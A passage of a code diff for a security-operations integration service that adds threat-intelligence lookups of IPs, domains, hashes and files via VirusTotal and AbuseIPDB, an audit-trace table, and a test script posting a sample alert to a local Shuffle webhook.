+            errors["abuseipdb"] = "AbuseIPDB supports ioc_type='ip' only"
511
+        else:
512
+            try:
513
+                abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
514
+                abuse_result, _, _, _ = _build_abuseipdb_ioc_result(
515
+                    abuse=abuse,
516
+                    ioc_value=payload.ioc_value,
517
+                    confidence_threshold=50,
518
+                )
519
+                per_provider["abuseipdb"] = abuse_result
520
+            except Exception as exc:
521
+                errors["abuseipdb"] = str(exc)
522
+
523
+    if not per_provider:
524
+        repo.add_ioc_trace(
525
+            action="evaluate",
526
+            ioc_type=payload.ioc_type,
527
+            ioc_value=payload.ioc_value,
528
+            providers=requested,
529
+            request_payload=payload.model_dump(mode="json"),
530
+            response_payload={},
531
+            error=str(errors),
532
+        )
533
+        raise HTTPException(status_code=502, detail=f"Provider evaluation failed: {errors}")
534
+
535
+    # aggregate decision (max confidence/severity, matched if any provider matched)
536
+    order = {"low": 1, "medium": 2, "high": 3, "critical": 4}
537
+    matched = any(bool(r.get("matched")) for r in per_provider.values())
538
+    confidence = max(float(r.get("confidence", 0.0) or 0.0) for r in per_provider.values())
539
+    severity = max((str(r.get("severity", "low")) for r in per_provider.values()), key=lambda x: order.get(x, 1))
540
+    reason_parts = [f"{name}:{res.get('reason','')}" for name, res in per_provider.items()]
541
+    if errors:
542
+        reason_parts.append(f"errors={errors}")
543
+    ioc_result = {
544
+        "ioc_type": payload.ioc_type,
545
+        "ioc_value": payload.ioc_value,
546
+        "matched": matched,
547
+        "severity": severity,
548
+        "confidence": round(confidence, 4),
549
+        "reason": " | ".join(reason_parts),
550
+        "providers": per_provider,
551
+    }
552
+
553
+    repo.add_ioc_trace(
554
+        action="evaluate",
555
+        ioc_type=payload.ioc_type,
556
+        ioc_value=payload.ioc_value,
557
+        providers=providers,
558
+        request_payload=payload.model_dump(mode="json"),
559
+        response_payload=ioc_result,
560
+        matched=matched,
561
+        severity=severity,
562
+        confidence=float(ioc_result["confidence"]),
563
+    )
564
+
565
+    return ApiResponse(data={"ioc": ioc_result})
566
+
567
+
568
+@app.post("/ioc/upload-file", response_model=ApiResponse)
569
+async def ioc_upload_file(file: UploadFile = File(...)) -> ApiResponse:
570
+    content = await file.read()
571
+    if not content:
572
+        raise HTTPException(status_code=400, detail="Uploaded file is empty")
573
+    try:
574
+        vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
575
+    except Exception as exc:
576
+        repo.add_ioc_trace(
577
+            action="upload_file",
578
+            ioc_type="hash",
579
+            ioc_value=file.filename or "<unknown>",
580
+            providers=["virustotal"],
581
+            request_payload={"filename": file.filename, "size": len(content)},
582
+            response_payload={},
583
+            error=str(exc),
584
+        )
585
+        raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
586
+
587
+    repo.add_ioc_trace(
588
+        action="upload_file",
589
+        ioc_type="hash",
590
+        ioc_value=file.filename or "<unknown>",
591
+        providers=["virustotal"],
592
+        request_payload={"filename": file.filename, "size": len(content)},
593
+        response_payload=vt_upload if isinstance(vt_upload, dict) else {"raw": str(vt_upload)},
594
+    )
595
+    return ApiResponse(data={"virustotal": vt_upload})
596
+
597
+
598
+@app.get("/ioc/analysis/{analysis_id}", response_model=ApiResponse)
599
+async def ioc_get_analysis(analysis_id: str) -> ApiResponse:
600
+    try:
601
+        vt_analysis = await virustotal_adapter.get_analysis(analysis_id)
602
+    except Exception as exc:
603
+        repo.add_ioc_trace(
604
+            action="analysis",
605
+            ioc_type="hash",
606
+            ioc_value=analysis_id,
607
+            providers=["virustotal"],
608
+            request_payload={"analysis_id": analysis_id},
609
+            response_payload={},
610
+            error=str(exc),
611
+        )
612
+        raise HTTPException(status_code=502, detail=f"VirusTotal analysis fetch failed: {exc}") from exc
613
+
614
+    repo.add_ioc_trace(
615
+        action="analysis",
616
+        ioc_type="hash",
617
+        ioc_value=analysis_id,
618
+        providers=["virustotal"],
619
+        request_payload={"analysis_id": analysis_id},
620
+        response_payload=vt_analysis if isinstance(vt_analysis, dict) else {"raw": str(vt_analysis)},
621
+    )
622
+    return ApiResponse(data={"virustotal": vt_analysis})
623
+
624
+
625
+@app.post("/ioc/evaluate-file", response_model=ApiResponse)
626
+async def ioc_evaluate_file(
627
+    file: UploadFile = File(...),
628
+    malicious_threshold: int = 1,
629
+    suspicious_threshold: int = 3,
630
+    poll_timeout_seconds: int = 30,
631
+    poll_interval_seconds: int = 2,
632
+) -> ApiResponse:
633
+    content = await file.read()
634
+    if not content:
635
+        raise HTTPException(status_code=400, detail="Uploaded file is empty")
636
+
637
+    try:
638
+        vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
639
+    except Exception as exc:
640
+        repo.add_ioc_trace(
641
+            action="evaluate_file",
642
+            ioc_type="hash",
643
+            ioc_value=file.filename or "<unknown>",
644
+            providers=["virustotal"],
645
+            request_payload={"filename": file.filename, "size": len(content)},
646
+            response_payload={},
647
+            error=str(exc),
648
+        )
649
+        raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
650
+
651
+    analysis_id = (
652
+        (((vt_upload.get("data") or {}).get("id")) if isinstance(vt_upload, dict) else None)
653
+        or ""
654
+    )
655
+    if not analysis_id:
656
+        raise HTTPException(status_code=502, detail="VirusTotal upload response missing analysis ID")
657
+
658
+    timeout = max(1, poll_timeout_seconds)
659
+    interval = max(1, poll_interval_seconds)
660
+    elapsed = 0
661
+    analysis: dict[str, object] = {}
662
+    while elapsed <= timeout:
663
+        analysis = await virustotal_adapter.get_analysis(analysis_id)
664
+        status = (
665
+            (((analysis.get("data") or {}).get("attributes") or {}).get("status"))
666
+            if isinstance(analysis, dict)
667
+            else None
668
+        )
669
+        if status == "completed":
670
+            break
671
+        await asyncio.sleep(interval)
672
+        elapsed += interval
673
+
674
+    sha256 = (
675
+        (((analysis.get("meta") or {}).get("file_info") or {}).get("sha256"))
676
+        if isinstance(analysis, dict)
677
+        else None
678
+    )
679
+    if not sha256:
680
+        raise HTTPException(status_code=502, detail="VirusTotal analysis did not return file hash yet")
681
+
682
+    try:
683
+        vt_file = await virustotal_adapter.enrich_ioc("hash", str(sha256))
684
+    except Exception as exc:
685
+        repo.add_ioc_trace(
686
+            action="evaluate_file",
687
+            ioc_type="hash",
688
+            ioc_value=str(sha256),
689
+            providers=["virustotal"],
690
+            request_payload={"filename": file.filename, "analysis_id": analysis_id},
691
+            response_payload={"upload": vt_upload, "analysis": analysis},
692
+            error=str(exc),
693
+        )
694
+        raise HTTPException(status_code=502, detail=f"VirusTotal report fetch failed: {exc}") from exc
695
+
696
+    ioc_result, matched, severity, confidence = _build_vt_ioc_result(
697
+        vt=vt_file,
698
+        ioc_type="hash",
699
+        ioc_value=str(sha256),
700
+        malicious_threshold=malicious_threshold,
701
+        suspicious_threshold=suspicious_threshold,
702
+    )
703
+    ioc_result["analysis_id"] = analysis_id
704
+    ioc_result["filename"] = file.filename
705
+
706
+    repo.add_ioc_trace(
707
+        action="evaluate_file",
708
+        ioc_type="hash",
709
+        ioc_value=str(sha256),
710
+        providers=["virustotal"],
711
+        request_payload={"filename": file.filename, "analysis_id": analysis_id},
712
+        response_payload={
713
+            "upload": vt_upload,
714
+            "analysis": analysis,
715
+            "ioc": ioc_result,
716
+        },
717
+        matched=matched,
718
+        severity=severity,
719
+        confidence=confidence,
720
+    )
721
+    return ApiResponse(data={"ioc": ioc_result, "analysis": analysis, "upload": vt_upload})
722
+
723
+
724
+@app.get("/ioc/history", response_model=ApiResponse)
725
+async def ioc_history(limit: int = 50, offset: int = 0) -> ApiResponse:
726
+    return ApiResponse(data={"items": repo.list_ioc_trace(limit=limit, offset=offset)})
727
+
728
+
300 729
 @app.get("/sync/wazuh-version", response_model=ApiResponse)
301 730
 async def sync_wazuh_version() -> ApiResponse:
302 731
     try:

+ 22 - 0
soc-integrator/app/models.py

@@ -25,6 +25,28 @@ class ActionCreateIncidentRequest(BaseModel):
25 25
     payload: dict[str, Any] = Field(default_factory=dict)
26 26
 
27 27
 
28
+class IrisTicketCreateRequest(BaseModel):
29
+    title: str
30
+    description: str = "Created by soc-integrator"
31
+    case_customer: int | None = None
32
+    case_soc_id: str | None = None
33
+    payload: dict[str, Any] = Field(default_factory=dict)
34
+
35
+
36
+class IocEnrichRequest(BaseModel):
37
+    ioc_type: Literal["domain", "ip", "hash", "url"]
38
+    ioc_value: str
39
+    providers: list[str] = Field(default_factory=lambda: ["virustotal"])
40
+
41
+
42
+class IocEvaluateRequest(BaseModel):
43
+    ioc_type: Literal["domain", "ip", "hash", "url"]
44
+    ioc_value: str
45
+    providers: list[str] = Field(default_factory=lambda: ["virustotal"])
46
+    malicious_threshold: int = 1
47
+    suspicious_threshold: int = 3
48
+
49
+
28 50
 class TriggerShuffleRequest(BaseModel):
29 51
     workflow_id: str
30 52
     execution_argument: dict[str, Any] = Field(default_factory=dict)

+ 49 - 0
soc-integrator/app/repositories/mvp_repo.py

@@ -151,3 +151,52 @@ class MvpRepository:
151 151
                 """,
152 152
                 (incident_key, status_code, success, response_excerpt),
153 153
             )
154
+
155
+    def add_ioc_trace(
156
+        self,
157
+        action: str,
158
+        ioc_type: str,
159
+        ioc_value: str,
160
+        providers: list[str],
161
+        request_payload: dict[str, Any],
162
+        response_payload: dict[str, Any],
163
+        matched: bool | None = None,
164
+        severity: str | None = None,
165
+        confidence: float | None = None,
166
+        error: str | None = None,
167
+    ) -> None:
168
+        with get_conn() as conn, conn.cursor() as cur:
169
+            cur.execute(
170
+                """
171
+                INSERT INTO ioc_trace(
172
+                  action, ioc_type, ioc_value, providers,
173
+                  request_payload, response_payload, matched, severity, confidence, error
174
+                )
175
+                VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)
176
+                """,
177
+                (
178
+                    action,
179
+                    ioc_type,
180
+                    ioc_value,
181
+                    Json(providers),
182
+                    Json(request_payload),
183
+                    Json(response_payload),
184
+                    matched,
185
+                    severity,
186
+                    confidence,
187
+                    error,
188
+                ),
189
+            )
190
+
191
+    def list_ioc_trace(self, limit: int = 50, offset: int = 0) -> list[dict[str, Any]]:
192
+        with get_conn() as conn, conn.cursor() as cur:
193
+            cur.execute(
194
+                """
195
+                SELECT id, action, ioc_type, ioc_value, providers, matched, severity, confidence, error, created_at
196
+                FROM ioc_trace
197
+                ORDER BY created_at DESC
198
+                LIMIT %s OFFSET %s
199
+                """,
200
+                (max(1, limit), max(0, offset)),
201
+            )
202
+            return [dict(row) for row in cur.fetchall()]

+ 19 - 0
soc-integrator/examples/README.md

@@ -25,3 +25,22 @@ This script demonstrates:
25 25
 
26 26
 1. Direct call to `IRIS /api/v2/cases`
27 27
 2. Call through `soc-integrator /action/create-iris-case`
28
+
29
+## Send sample event to Shuffle webhook
30
+
31
+Use this helper with the sample workflow:
32
+
33
+- `shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json` (repo-relative path)
34
+
35
+Run:
36
+
37
+```bash
38
+SHUFFLE_WEBHOOK_URL='http://localhost:3001/api/v1/hooks/webhook_xxx' \
39
+bash soc-integrator/examples/send_to_shuffle_webhook.sh
40
+```
41
+
42
+Environment variables:
43
+
44
+- `SHUFFLE_WEBHOOK_URL` (required)
45
+- `INTEGRATOR_URL` (default: `http://localhost:8088`)
46
+- `INTERNAL_KEY` (optional)

+ 29 - 0
soc-integrator/examples/send_to_shuffle_webhook.sh

@@ -0,0 +1,29 @@
1
#!/usr/bin/env bash
# Send a sample SOC event to a Shuffle webhook for end-to-end testing.
#
# Required env:
#   SHUFFLE_WEBHOOK_URL  - full Shuffle webhook endpoint URL
# Optional env:
#   INTEGRATOR_URL       - soc-integrator base URL (default: http://localhost:8088)
#   INTERNAL_KEY         - internal auth key forwarded inside the payload
set -euo pipefail

SHUFFLE_WEBHOOK_URL="${SHUFFLE_WEBHOOK_URL:-}"
INTEGRATOR_URL="${INTEGRATOR_URL:-http://localhost:8088}"
INTERNAL_KEY="${INTERNAL_KEY:-}"

if [[ -z "${SHUFFLE_WEBHOOK_URL}" ]]; then
  # Diagnostics belong on stderr so stdout stays clean for pipelines.
  {
    echo "error: SHUFFLE_WEBHOOK_URL is required"
    echo "example:"
    echo "  SHUFFLE_WEBHOOK_URL='http://localhost:3001/api/v1/hooks/webhook_...' \\"
    echo "  bash soc-integrator/examples/send_to_shuffle_webhook.sh"
  } >&2
  exit 1
fi

# -f makes curl exit non-zero on HTTP 4xx/5xx so 'set -e' catches a
# failed delivery instead of silently reporting success.
# NOTE(review): env values are interpolated directly into the JSON body;
# values containing double quotes or backslashes would produce invalid
# JSON. Acceptable for a test helper, but do not feed untrusted input.
curl -fsS -X POST "${SHUFFLE_WEBHOOK_URL}" \
  -H "Content-Type: application/json" \
  --data @- <<EOF
{
  "event_id": "soc-integrator-test-$(date +%s)",
  "source": "soc-integrator",
  "severity": "high",
  "title": "Suspicious VPN login outside Thailand",
  "description": "Detected by soc-integrator test script",
  "integrator_url": "${INTEGRATOR_URL}",
  "internal_key": "${INTERNAL_KEY}"
}
EOF

echo
echo "sent webhook payload to Shuffle"

+ 1 - 0
soc-integrator/requirements.txt

@@ -3,3 +3,4 @@ uvicorn==0.35.0
3 3
 httpx==0.28.1
4 4
 pydantic-settings==2.10.1
5 5
 psycopg[binary]==3.2.1
6
+python-multipart==0.0.20

+ 0 - 6
wazuh-docker/.env

@@ -1,6 +0,0 @@
1
-WAZUH_VERSION=4.14.3
2
-WAZUH_IMAGE_VERSION=4.14.3
3
-WAZUH_TAG_REVISION=1
4
-FILEBEAT_TEMPLATE_BRANCH=4.14.3
5
-WAZUH_FILEBEAT_MODULE=wazuh-filebeat-0.5.tar.gz
6
-WAZUH_UI_REVISION=1